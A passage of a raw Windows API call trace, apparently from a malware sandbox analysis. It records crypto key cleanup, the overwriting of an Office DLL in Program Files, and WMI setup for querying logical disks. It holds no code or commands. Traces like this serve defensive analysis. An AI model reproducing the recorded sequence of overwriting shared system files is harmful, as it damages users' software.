[0175.343] CryptDestroyKey (hKey=0xb7f110) returned 1 [0175.343] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0175.343] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0175.343] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL", lpFilePart=0x0) returned 0x3f [0175.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0175.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0175.658] GetFileType (hFile=0x5a0) returned 0x1 [0175.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0175.658] GetFileType (hFile=0x5a0) returned 0x1 [0175.658] WriteFile (in: hFile=0x5a0, lpBuffer=0x36f12b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x36f12b4*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0175.659] CloseHandle (hObject=0x5a0) returned 1 [0175.660] CoTaskMemAlloc (cb=0x20c) returned 0xbe2e58 [0175.660] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe2e58 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0175.660] CoTaskMemFree (pv=0xbe2e58) [0175.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0175.660] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0175.661] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0175.661] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0175.661] IUnknown:Release (This=0xb51e34) returned 0x1 [0175.662] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x60277c0) returned 0x0 [0175.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0175.662] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x60308d0) returned 0x0 [0175.662] WbemDefPath:IUnknown:Release (This=0x60277c0) returned 0x0 [0175.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x60308d0) returned 0x0 [0175.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0175.662] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0175.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0175.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0175.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbe2330) returned 0x0 [0175.662] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2330, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0175.662] WbemDefPath:IUnknown:Release (This=0xbe2330) returned 0x3 [0175.662] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0175.662] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0175.662] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0175.662] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0175.663] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0175.663] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0175.663] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0175.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x60308d0) returned 0x0 [0175.663] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0175.663] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0175.663] WbemDefPath:IWbemPath:SetText (This=0x60308d0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetInfo (in: This=0x60308d0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetInfo (in: This=0x60308d0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetInfo (in: This=0x60308d0, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0175.663] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.663] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0175.663] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0175.663] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0175.663] IUnknown:Release (This=0xb51e34) returned 0x1 [0175.664] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027620) returned 0x0 [0175.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027620, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0175.664] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027620, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6030860) returned 0x0 [0175.664] WbemDefPath:IUnknown:Release (This=0x6027620) returned 0x0 [0175.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6030860) returned 0x0 [0175.664] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0175.665] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0175.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0175.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0175.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbe23b0) returned 0x0 [0175.665] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe23b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0175.665] WbemDefPath:IUnknown:Release (This=0xbe23b0) returned 0x3 [0175.665] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0175.665] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0175.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0175.665] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0175.665] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0175.665] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0175.665] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0175.665] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6030860) returned 0x0 [0175.665] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0175.665] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0175.665] WbemDefPath:IWbemPath:SetText (This=0x6030860, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0175.665] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0175.665] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0175.665] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.665] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0175.665] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0175.665] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0175.665] IUnknown:Release (This=0xb51e34) returned 0x1 [0175.666] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6023d08) returned 0x0 [0175.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6023d08, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0175.666] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023d08, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6027600) returned 0x0 [0175.666] WbemLocator:IUnknown:Release (This=0x6023d08) returned 0x0 [0175.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6027600, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6027600) returned 0x0 [0175.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6027600, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0175.666] WbemLocator:IUnknown:AddRef (This=0x6027600) returned 0x3 [0175.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6027600, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0175.666] WbemLocator:IUnknown:QueryInterface (in: This=0x6027600, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0175.667] WbemLocator:IUnknown:QueryInterface (in: This=0x6027600, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0175.667] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0175.667] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0175.667] WbemLocator:IUnknown:QueryInterface (in: This=0x6027600, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0175.667] WbemLocator:IUnknown:Release (This=0x6027600) returned 0x2 [0175.667] WbemLocator:IUnknown:Release (This=0x6027600) returned 0x1 [0175.667] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0175.667] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0175.667] WbemLocator:IUnknown:QueryInterface (in: This=0x6027600, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6027600) returned 0x0 [0175.667] WbemLocator:IUnknown:AddRef (This=0x6027600) returned 0x3 [0175.667] WbemLocator:IUnknown:Release (This=0x6027600) returned 0x2 [0175.667] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0175.667] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0175.667] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.667] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027610) returned 0x0 [0175.667] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027610, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x6033164) returned 0x0 [0177.155] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5b6d4) returned 0x0 [0177.155] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b6d4, pProxy=0x6033164, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0177.155] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x1 [0177.155] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5b6f4) returned 0x0 [0177.155] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5b6d4) returned 0x0 [0177.155] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b6d4, pProxy=0x6033164, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0177.156] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x2 [0177.156] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0177.156] CoTaskMemFree (pv=0xbd4a68) [0177.156] WbemLocator:IUnknown:Release (This=0x6027610) returned 0x0 [0177.156] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5b6f4) returned 0x0 [0177.156] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0177.158] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, 